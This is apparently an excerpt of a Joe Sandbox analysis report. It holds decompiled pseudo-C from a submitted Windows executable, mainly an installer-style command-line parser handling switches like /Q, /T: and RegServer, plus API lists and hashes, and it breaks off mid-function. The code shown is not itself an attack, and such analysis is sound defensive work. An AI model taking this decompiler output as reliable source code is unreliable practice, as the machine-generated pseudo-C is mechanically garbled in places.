	intOrPtr* _t219;
	intOrPtr* _t220;
	signed int _t221;
	signed int _t223;

	_t173 = __ecx;
	_t61 =  *0x868004; // 0xb82e2007
	_v8 = _t61 ^ _t221;
	_push(__ebx);
	_push(__esi);
	_push(__edi);
	_t209 = 1;
	if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                          					_t63 = 1;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                          					while(_t209 != 0) {
                                                                                                                                                                                                          						_t67 =  *_t173;
                                                                                                                                                                                                          						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                          							_t173 = CharNextA(_t173);
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v272 = _t173;
                                                                                                                                                                                                          						if(_t67 == 0) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t69 = _v272;
                                                                                                                                                                                                          							_t177 = 0;
                                                                                                                                                                                                          							_t213 = 0;
                                                                                                                                                                                                          							_t163 = 0;
                                                                                                                                                                                                          							_t202 = 1;
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								if(_t213 != 0) {
                                                                                                                                                                                                          									if(_t163 != 0) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										goto L21;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t69 =  *_t69;
                                                                                                                                                                                                          									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t69 = _v272;
                                                                                                                                                                                                          										L21:
                                                                                                                                                                                                          										_t155 =  *_t69;
                                                                                                                                                                                                          										if(_t155 != 0x22) {
                                                                                                                                                                                                          											if(_t202 >= 0x104) {
                                                                                                                                                                                                          												goto L106;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                          												_t177 = _t177 + 1;
                                                                                                                                                                                                          												_t202 = _t202 + 1;
                                                                                                                                                                                                          												_t157 = 1;
                                                                                                                                                                                                          												goto L30;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											if(_v272[1] == 0x22) {
                                                                                                                                                                                                          												if(_t202 >= 0x104) {
                                                                                                                                                                                                          													L106:
                                                                                                                                                                                                          													_t63 = 0;
                                                                                                                                                                                                          													L125:
                                                                                                                                                                                                          													_pop(_t210);
                                                                                                                                                                                                          													_pop(_t212);
                                                                                                                                                                                                          													_pop(_t162);
                                                                                                                                                                                                          													return E00866CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                          													_t177 = _t177 + 1;
                                                                                                                                                                                                          													_t202 = _t202 + 1;
                                                                                                                                                                                                          													_t157 = 2;
                                                                                                                                                                                                          													goto L30;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t157 = 1;
                                                                                                                                                                                                          												if(_t213 != 0) {
                                                                                                                                                                                                          													_t163 = 1;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t213 = 1;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L30;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L131;
                                                                                                                                                                                                          								L30:
                                                                                                                                                                                                          								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                          								_t69 = _v272;
                                                                                                                                                                                                          							} while ( *_t69 != 0);
                                                                                                                                                                                                          							if(_t177 >= 0x104) {
                                                                                                                                                                                                          								E00866E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                          								_push(_t221);
                                                                                                                                                                                                          								_t222 = _t223;
                                                                                                                                                                                                          								_t71 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                          								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                          									0x4f0 = 2;
                                                                                                                                                                                                          									_t75 = E0086597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									E008644B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                          									 *0x869124 = E00866285();
                                                                                                                                                                                                          									_t75 = 0;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								return E00866CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                          								if(_t213 == 0) {
                                                                                                                                                                                                          									if(_t163 != 0) {
                                                                                                                                                                                                          										goto L34;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										goto L40;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									if(_t163 != 0) {
                                                                                                                                                                                                          										L40:
                                                                                                                                                                                                          										_t79 = _v268;
                                                                                                                                                                                                          										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                          											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                          											if(_t83 == 0) {
                                                                                                                                                                                                          												_t202 = 0x521;
                                                                                                                                                                                                          												E008644B9(0, 0x521, 0x861140, 0, 0x40, 0);
                                                                                                                                                                                                          												_t85 =  *0x868588; // 0x0
                                                                                                                                                                                                          												if(_t85 != 0) {
                                                                                                                                                                                                          													CloseHandle(_t85);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												ExitProcess(0);
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t87 = _t83 - 4;
                                                                                                                                                                                                          											if(_t87 == 0) {
                                                                                                                                                                                                          												if(_v266 != 0) {
                                                                                                                                                                                                          													if(_v266 != 0x3a) {
                                                                                                                                                                                                          														goto L49;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                          														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                          														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                          														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                          														_t202 = _t50;
                                                                                                                                                                                                          														do {
                                                                                                                                                                                                          															_t88 =  *_t183;
                                                                                                                                                                                                          															_t183 = _t183 + 1;
                                                                                                                                                                                                          														} while (_t88 != 0);
                                                                                                                                                                                                          														if(_t183 == _t202) {
                                                                                                                                                                                                          															goto L49;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t205 = 0x5b;
                                                                                                                                                                                                          															if(E0086667F(_t215, _t205) == 0) {
                                                                                                                                                                                                          																L115:
                                                                                                                                                                                                          																_t206 = 0x5d;
                                                                                                                                                                                                          																if(E0086667F(_t215, _t206) == 0) {
                                                                                                                                                                                                          																	L117:
                                                                                                                                                                                                          																	_t202 =  &_v276;
                                                                                                                                                                                                          																	_v276 = _t167;
                                                                                                                                                                                                          																	if(E00865C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                          																		goto L49;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		_t202 = 0x104;
                                                                                                                                                                                                          																		E00861680(0x868c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	_t202 = 0x5b;
                                                                                                                                                                                                          																	if(E0086667F(_t215, _t202) == 0) {
                                                                                                                                                                                                          																		goto L49;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		goto L117;
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_t202 = 0x5d;
                                                                                                                                                                                                          																if(E0086667F(_t215, _t202) == 0) {
                                                                                                                                                                                                          																	goto L49;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	goto L115;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													 *0x868a24 = 1;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L50;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t100 = _t87 - 1;
                                                                                                                                                                                                          												if(_t100 == 0) {
                                                                                                                                                                                                          													L98:
                                                                                                                                                                                                          													if(_v266 != 0x3a) {
                                                                                                                                                                                                          														goto L49;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                          														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                          														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                          														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                          														_t202 = _t38;
                                                                                                                                                                                                          														do {
                                                                                                                                                                                                          															_t101 =  *_t192;
                                                                                                                                                                                                          															_t192 = _t192 + 1;
                                                                                                                                                                                                          														} while (_t101 != 0);
                                                                                                                                                                                                          														if(_t192 == _t202) {
                                                                                                                                                                                                          															goto L49;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t202 =  &_v276;
                                                                                                                                                                                                          															_v276 = _t170;
                                                                                                                                                                                                          															if(E00865C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                          																goto L49;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                          																_t218 = 0x868b3e;
                                                                                                                                                                                                          																_t105 = _v276;
                                                                                                                                                                                                          																if(_t104 != 0x54) {
                                                                                                                                                                                                          																	_t218 = 0x868a3a;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          																E00861680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                          																_t202 = 0x104;
                                                                                                                                                                                                          																E0086658A(_t218, 0x104, 0x861140);
                                                                                                                                                                                                          																if(E008631E0(_t218) != 0) {
                                                                                                                                                                                                          																	goto L50;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	goto L106;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t111 = _t100 - 0xa;
                                                                                                                                                                                                          													if(_t111 == 0) {
                                                                                                                                                                                                          														if(_v266 != 0) {
                                                                                                                                                                                                          															if(_v266 != 0x3a) {
                                                                                                                                                                                                          																goto L49;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_t199 = _v265;
                                                                                                                                                                                                          																if(_t199 != 0) {
                                                                                                                                                                                                          																	_t219 =  &_v265;
                                                                                                                                                                                                          																	do {
                                                                                                                                                                                                          																		_t219 = _t219 + 1;
                                                                                                                                                                                                          																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                          																		if(_t115 == 0) {
                                                                                                                                                                                                          																			 *0x868a2c = 1;
                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                          																			_t200 = 2;
                                                                                                                                                                                                          																			_t119 = _t115 - _t200;
                                                                                                                                                                                                          																			if(_t119 == 0) {
                                                                                                                                                                                                          																				 *0x868a30 = 1;
                                                                                                                                                                                                          																			} else {
                                                                                                                                                                                                          																				if(_t119 == 0xf) {
                                                                                                                                                                                                          																					 *0x868a34 = 1;
                                                                                                                                                                                                          																				} else {
                                                                                                                                                                                                          																					_t209 = 0;
                                                                                                                                                                                                          																				}
                                                                                                                                                                                                          																			}
                                                                                                                                                                                                          																		}
                                                                                                                                                                                                          																		_t118 =  *_t219;
                                                                                                                                                                                                          																		_t199 = _t118;
                                                                                                                                                                                                          																	} while (_t118 != 0);
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															 *0x868a2c = 1;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L50;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t127 = _t111 - 3;
                                                                                                                                                                                                          														if(_t127 == 0) {
                                                                                                                                                                                                          															if(_v266 != 0) {
                                                                                                                                                                                                          																if(_v266 != 0x3a) {
                                                                                                                                                                                                          																	goto L49;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                          																	if(_t129 == 0x31) {
                                                                                                                                                                                                          																		goto L76;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		if(_t129 == 0x41) {
                                                                                                                                                                                                          																			goto L83;
                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                          																			if(_t129 == 0x55) {
                                                                                                                                                                                                          																				goto L76;
                                                                                                                                                                                                          																			} else {
                                                                                                                                                                                                          																				goto L49;
                                                                                                                                                                                                          																			}
                                                                                                                                                                                                          																		}
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																L76:
                                                                                                                                                                                                          																_push(2);
                                                                                                                                                                                                          																_pop(1);
                                                                                                                                                                                                          																L83:
                                                                                                                                                                                                          																 *0x868a38 = 1;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															goto L50;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t132 = _t127 - 1;
                                                                                                                                                                                                          															if(_t132 == 0) {
                                                                                                                                                                                                          																if(_v266 != 0) {
                                                                                                                                                                                                          																	if(_v266 != 0x3a) {
                                                                                                                                                                                                          																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                          																			goto L49;
                                                                                                                                                                                                          																		}
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		_t201 = _v265;
                                                                                                                                                                                                          																		 *0x869a2c = 1;
                                                                                                                                                                                                          																		if(_t201 != 0) {
                                                                                                                                                                                                          																			_t220 =  &_v265;
                                                                                                                                                                                                          																			do {
                                                                                                                                                                                                          																				_t220 = _t220 + 1;
                                                                                                                                                                                                          																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                          																				if(_t142 == 0) {
                                                                                                                                                                                                          																					_t143 = 2;
                                                                                                                                                                                                          																					 *0x869a2c =  *0x869a2c | _t143;
                                                                                                                                                                                                          																					goto L70;
                                                                                                                                                                                                          																				} else {
                                                                                                                                                                                                          																					_t145 = _t142 - 3;
                                                                                                                                                                                                          																					if(_t145 == 0) {
                                                                                                                                                                                                          																						 *0x868d48 =  *0x868d48 | 0x00000040;
                                                                                                                                                                                                          																					} else {
                                                                                                                                                                                                          																						_t146 = _t145 - 5;
                                                                                                                                                                                                          																						if(_t146 == 0) {
                                                                                                                                                                                                          																							 *0x869a2c =  *0x869a2c & 0xfffffffd;
                                                                                                                                                                                                          																							goto L70;
                                                                                                                                                                                                          																						} else {
                                                                                                                                                                                                          																							_t147 = _t146 - 5;
                                                                                                                                                                                                          																							if(_t147 == 0) {
                                                                                                                                                                                                          																								 *0x869a2c =  *0x869a2c & 0xfffffffe;
                                                                                                                                                                                                          																								goto L70;
                                                                                                                                                                                                          																							} else {
                                                                                                                                                                                                          																								_t149 = _t147;
                                                                                                                                                                                                          																								if(_t149 == 0) {
                                                                                                                                                                                                          																									 *0x868d48 =  *0x868d48 | 0x00000080;
                                                                                                                                                                                                          																								} else {
                                                                                                                                                                                                          																									if(_t149 == 3) {
                                                                                                                                                                                                          																										 *0x869a2c =  *0x869a2c | 0x00000004;
                                                                                                                                                                                                          																										L70:
                                                                                                                                                                                                          																										 *0x868a28 = 1;
                                                                                                                                                                                                          																									} else {
                                                                                                                                                                                                          																										_t209 = 0;
                                                                                                                                                                                                          																									}
                                                                                                                                                                                                          																								}
                                                                                                                                                                                                          																							}
                                                                                                                                                                                                          																						}
                                                                                                                                                                                                          																					}
                                                                                                                                                                                                          																				}
                                                                                                                                                                                                          																				_t144 =  *_t220;
                                                                                                                                                                                                          																				_t201 = _t144;
                                                                                                                                                                                                          																			} while (_t144 != 0);
                                                                                                                                                                                                          																		}
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	 *0x869a2c = 3;
                                                                                                                                                                                                          																	 *0x868a28 = 1;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          																goto L50;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																if(_t132 == 0) {
                                                                                                                                                                                                          																	goto L98;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	L49:
                                                                                                                                                                                                          																	_t209 = 0;
                                                                                                                                                                                                          																	L50:
                                                                                                                                                                                                          																	_t173 = _v272;
                                                                                                                                                                                                          																	if( *_t173 != 0) {
                                                                                                                                                                                                          																		goto L2;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		break;
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L106;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										L34:
                                                                                                                                                                                                          										_t209 = 0;
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L131;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if( *0x868a2c != 0 &&  *0x868b3e == 0) {
                                                                                                                                                                                                          						if(GetModuleFileNameA( *0x869a3c, 0x868b3e, 0x104) == 0) {
                                                                                                                                                                                                          							_t209 = 0;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t202 = 0x5c;
                                                                                                                                                                                                          							 *((char*)(E008666C8(0x868b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t63 = _t209;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L131:
                                                                                                                                                                                                          			}
                                                                                                                                                                                                          0x00865d3f
                                                                                                                                                                                                          0x00865d3f
                                                                                                                                                                                                          0x00865d4b
                                                                                                                                                                                                          0x00865d4b
                                                                                                                                                                                                          0x00865d4f
                                                                                                                                                                                                          0x00865d8d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d93
                                                                                                                                                                                                          0x00865d93
                                                                                                                                                                                                          0x00865d9a
                                                                                                                                                                                                          0x00865d9d
                                                                                                                                                                                                          0x00865d9e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d9e
                                                                                                                                                                                                          0x00865d51
                                                                                                                                                                                                          0x00865d5b
                                                                                                                                                                                                          0x00865d72
                                                                                                                                                                                                          0x008660fb
                                                                                                                                                                                                          0x008660fb
                                                                                                                                                                                                          0x00866207
                                                                                                                                                                                                          0x0086620a
                                                                                                                                                                                                          0x0086620b
                                                                                                                                                                                                          0x0086620e
                                                                                                                                                                                                          0x00866217
                                                                                                                                                                                                          0x00865d78
                                                                                                                                                                                                          0x00865d78
                                                                                                                                                                                                          0x00865d80
                                                                                                                                                                                                          0x00865d83
                                                                                                                                                                                                          0x00865d84
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d84
                                                                                                                                                                                                          0x00865d5d
                                                                                                                                                                                                          0x00865d5f
                                                                                                                                                                                                          0x00865d62
                                                                                                                                                                                                          0x00865d68
                                                                                                                                                                                                          0x00865d64
                                                                                                                                                                                                          0x00865d64
                                                                                                                                                                                                          0x00865d64
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d62
                                                                                                                                                                                                          0x00865d5b
                                                                                                                                                                                                          0x00865d4f
                                                                                                                                                                                                          0x00865d1d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d9f
                                                                                                                                                                                                          0x00865d9f
                                                                                                                                                                                                          0x00865da5
                                                                                                                                                                                                          0x00865dab
                                                                                                                                                                                                          0x00865dba
                                                                                                                                                                                                          0x00866218
                                                                                                                                                                                                          0x0086621d
                                                                                                                                                                                                          0x00866220
                                                                                                                                                                                                          0x00866221
                                                                                                                                                                                                          0x00866229
                                                                                                                                                                                                          0x00866230
                                                                                                                                                                                                          0x00866247
                                                                                                                                                                                                          0x0086626a
                                                                                                                                                                                                          0x00866272
                                                                                                                                                                                                          0x00866249
                                                                                                                                                                                                          0x00866255
                                                                                                                                                                                                          0x0086625f
                                                                                                                                                                                                          0x00866264
                                                                                                                                                                                                          0x00866264
                                                                                                                                                                                                          0x00866284
                                                                                                                                                                                                          0x00865dc0
                                                                                                                                                                                                          0x00865dc0
                                                                                                                                                                                                          0x00865dca
                                                                                                                                                                                                          0x00865e22
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865dcc
                                                                                                                                                                                                          0x00865dce
                                                                                                                                                                                                          0x00865e24
                                                                                                                                                                                                          0x00865e24
                                                                                                                                                                                                          0x00865e2c
                                                                                                                                                                                                          0x00865e47
                                                                                                                                                                                                          0x00865e4a
                                                                                                                                                                                                          0x008661d2
                                                                                                                                                                                                          0x008661e2
                                                                                                                                                                                                          0x008661e7
                                                                                                                                                                                                          0x008661ee
                                                                                                                                                                                                          0x008661f1
                                                                                                                                                                                                          0x008661f1
                                                                                                                                                                                                          0x008661f8
                                                                                                                                                                                                          0x008661f8
                                                                                                                                                                                                          0x00865e50
                                                                                                                                                                                                          0x00865e53
                                                                                                                                                                                                          0x00866109
                                                                                                                                                                                                          0x0086611f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866125
                                                                                                                                                                                                          0x00866137
                                                                                                                                                                                                          0x0086613a
                                                                                                                                                                                                          0x0086613c
                                                                                                                                                                                                          0x0086613e
                                                                                                                                                                                                          0x0086613e
                                                                                                                                                                                                          0x00866141
                                                                                                                                                                                                          0x00866141
                                                                                                                                                                                                          0x00866143
                                                                                                                                                                                                          0x00866144
                                                                                                                                                                                                          0x0086614a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866150
                                                                                                                                                                                                          0x00866152
                                                                                                                                                                                                          0x0086615c
                                                                                                                                                                                                          0x00866170
                                                                                                                                                                                                          0x00866172
                                                                                                                                                                                                          0x0086617c
                                                                                                                                                                                                          0x00866190
                                                                                                                                                                                                          0x00866190
                                                                                                                                                                                                          0x00866196
                                                                                                                                                                                                          0x008661a5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008661ab
                                                                                                                                                                                                          0x008661b9
                                                                                                                                                                                                          0x008661c6
                                                                                                                                                                                                          0x008661c6
                                                                                                                                                                                                          0x0086617e
                                                                                                                                                                                                          0x00866180
                                                                                                                                                                                                          0x0086618a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086618a
                                                                                                                                                                                                          0x0086615e
                                                                                                                                                                                                          0x00866160
                                                                                                                                                                                                          0x0086616a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865f50
                                                                                                                                                                                                          0x00865f54
                                                                                                                                                                                                          0x00865ed4
                                                                                                                                                                                                          0x00865ea2
                                                                                                                                                                                                          0x00865ea4
                                                                                                                                                                                                          0x00865eaf
                                                                                                                                                                                                          0x00865eaf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e79
                                                                                                                                                                                                          0x00865e7d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e83
                                                                                                                                                                                                          0x00865e83
                                                                                                                                                                                                          0x00865e83
                                                                                                                                                                                                          0x00865e85
                                                                                                                                                                                                          0x00865e85
                                                                                                                                                                                                          0x00865e8e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e94
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865e94
                                                                                                                                                                                                          0x00865e8e
                                                                                                                                                                                                          0x00865e7d
                                                                                                                                                                                                          0x00865e77
                                                                                                                                                                                                          0x00865e6e
                                                                                                                                                                                                          0x00865e65
                                                                                                                                                                                                          0x00865e5c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865dd0
                                                                                                                                                                                                          0x00865dd0
                                                                                                                                                                                                          0x00865dd0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865dd0
                                                                                                                                                                                                          0x00865dce
                                                                                                                                                                                                          0x00865dca
                                                                                                                                                                                                          0x00865dba
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865d00
                                                                                                                                                                                                          0x00865dd9
                                                                                                                                                                                                          0x00865e04
                                                                                                                                                                                                          0x008661fe
                                                                                                                                                                                                          0x00865e0a
                                                                                                                                                                                                          0x00865e0c
                                                                                                                                                                                                          0x00865e17
                                                                                                                                                                                                          0x00865e17
                                                                                                                                                                                                          0x00865e04
                                                                                                                                                                                                          0x00866200
                                                                                                                                                                                                          0x00866200
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharNextA.USER32(?,00000000,?,?), ref: 00865CEE
                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00868B3E,00000104,00000000,?,?), ref: 00865DFC
                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 00865E3E
                                                                                                                                                                                                          • CharUpperA.USER32(-00000052), ref: 00865EE1
                                                                                                                                                                                                          • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00865F6F
                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 00865FA7
                                                                                                                                                                                                          • CharUpperA.USER32(-0000004E), ref: 00866008
                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 008660AA
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00861140,00000000,00000040,00000000), ref: 008661F1
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 008661F8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                          • String ID: "$"$:$RegServer
                                                                                                                                                                                                          • API String ID: 1203814774-25366791
                                                                                                                                                                                                          • Opcode ID: 81de80c48ad8d6d20fbee3dbab4a165165bddd85ea8ca490b315afd5fe15f6fb
                                                                                                                                                                                                          • Instruction ID: 5d6a32c183a021fec4a4eb05e4456edda3d03416e863d77b82628c1f1b8623a8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81de80c48ad8d6d20fbee3dbab4a165165bddd85ea8ca490b315afd5fe15f6fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D15F71A04A989FDF358B3C9C487B93BA5FB16304F1701BAD4C6D6191EBB18E868F41
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                          			E008618A3(void* __edx, void* __esi) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				short _v12;
                                                                                                                                                                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                          				long _t45;
                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t51 = __esi;
                                                                                                                                                                                                          				_t49 = __edx;
                                                                                                                                                                                                          				_t23 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                          				_t25 =  *0x868128; // 0x2
